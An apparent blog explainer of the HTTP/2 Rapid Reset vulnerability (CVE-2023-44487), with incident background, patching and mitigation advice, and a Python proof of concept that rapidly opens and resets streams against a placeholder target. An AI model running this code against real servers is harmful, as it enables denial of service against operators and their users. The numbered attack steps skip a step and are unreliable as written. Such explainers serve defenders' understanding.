CVE-2023-44487 - HTTP/2 Rapid Reset Attack Explained—with Exploit Code and How It Took Down Web Servers

In the second half of 2023, a pretty serious vulnerability was discovered and used in the wild. Named CVE-2023-44487, this bug targets the popular HTTP/2 protocol, creating a dangerous opportunity for attackers: they could crash (or severely overwhelm) almost any web server that supports HTTP/2. If you run a web service, this is a story you don’t want to skip.

From August to October 2023, sites from all over reported big outages—including cloud providers, popular websites, and small businesses. Let’s break down how this DDoS (distributed denial of service) exploit works, see the code, and point you toward official resources. We’ll keep the jargon light and focus on what matters.

What Is CVE-2023-44487?

In simple terms: the HTTP/2 protocol has a feature called "stream reset," which is meant to help clients cancel their own requests quickly if they’re no longer interested in what the server would return.

Attackers figured out that, by rapidly repeating a cycle of requesting and immediately canceling streams via the RST_STREAM frame, they could force servers to waste tons of resources handling these rapid-fire resets—eventually overwhelming the server.

Is This Really Dangerous?

YES. This attack was used in the wild. Google, Amazon, and Cloudflare all confirmed incidents, setting records for some of the biggest DDoS attacks ever tracked. Attackers could generate hundreds of millions of requests per second.

If your server lets clients open multiple HTTP/2 streams, you're in the risk zone. Classic HTTP/1.1 users are safe, but most modern web services support HTTP/2 by default today.

Here’s what’s going on under the hood

1. The attacker opens a new HTTP/2 connection.

Right after, they send a RST_STREAM frame for the same stream (canceling it).

4. They repeat the above two steps, blasting open streams and resetting them without ever waiting for a reply.

This forced the server to do a lot of work for nothing, with almost no cost to the attacker.

Exploit Code Example (Python with hyper-h2)

Let’s see a proof of concept in Python. This will hammer a victim server with rapid resets. This is for educational purposes only — never use this code to attack real systems.

import socket
import ssl
import time
import h2.connection

HOST = "target.server.com"  # <--- Replace this!
PORT = 443

# Set up socket and wrap with SSL
s = socket.create_connection((HOST, PORT))
context = ssl.create_default_context()
s = context.wrap_socket(s, server_hostname=HOST)

conn = h2.connection.H2Connection()
conn.initiate_connection()
s.sendall(conn.data_to_send())

streams = 100

for i in range(1, streams):
    # Send a HEADERS frame to open a stream
    headers = [
        (':method', 'GET'),
        (':authority', HOST),
        (':scheme', 'https'),
        (':path', '/'),
    ]
    conn.send_headers(i, headers)
    s.sendall(conn.data_to_send())
    # Now, reset the stream (attack!)
    conn.reset_stream(i)
    s.sendall(conn.data_to_send())
    print(f'Stream {i} RESET')

s.close()

> Note: You need the hyper-h2 library to run this. Install with pip install h2.

What Did the Real Attacks Look Like?

Real attackers automated the process above and distributed it across thousands of computers (botnets or compromised servers). The result? Targeted sites got hit by hundreds of millions of rapid resets per second. Even the best hardware and biggest clouds struggled to stay online.

Some official incident reports

- Cloudflare: HTTP/2 Rapid Reset Attack
- AWS Analysis
- Google Security Blog: "The largest DDoS attacks yet"
- CVE Record

How Can Servers Defend Themselves?

If you use a public cloud (Cloudflare, AWS, Google, etc.), they patched this issue in October 2023. But if you run your own infrastructure, update your HTTP/2 libraries and web servers now!

Monitor for unusual patterns (like hundreds of streams instantly resetting)

- Upgrade web server software (nginx, Apache, Envoy, node.js, etc.—all have patched versions available)
- Disable HTTP/2 (if you don’t need it, until you patch)

Patch references

- nginx HTTP/2 patch info
- Apache httpd release notes
- node.js advisory

Wrapping Up

CVE-2023-44487 is a unique HTTP/2 DDoS bug that forced the whole industry to rethink how request cancellations are handled. Attacks in 2023 using this method were some of the largest ever seen—reminding us that sometimes, a well-intentioned design feature (rapid resets) can be twisted into a major vulnerability.

If you operate any web server with HTTP/2 enabled, update/patch it now.

For researchers and defenders who want to test their own systems, see the code above (on your *own* infrastructure!), and stay current with vendor recommendations.

References

- CVE-2023-44487 - NVD (Official)
- Cloudflare’s Technical Blog
- Google’s DDoS Analysis
- AWS Security Bulletin
- Hyper-h2 (Python HTTP/2 Lib)

Timeline

Published on: 10/10/2023 14:15:10 UTC
Last modified on: 11/25/2023 11:15:18 UTC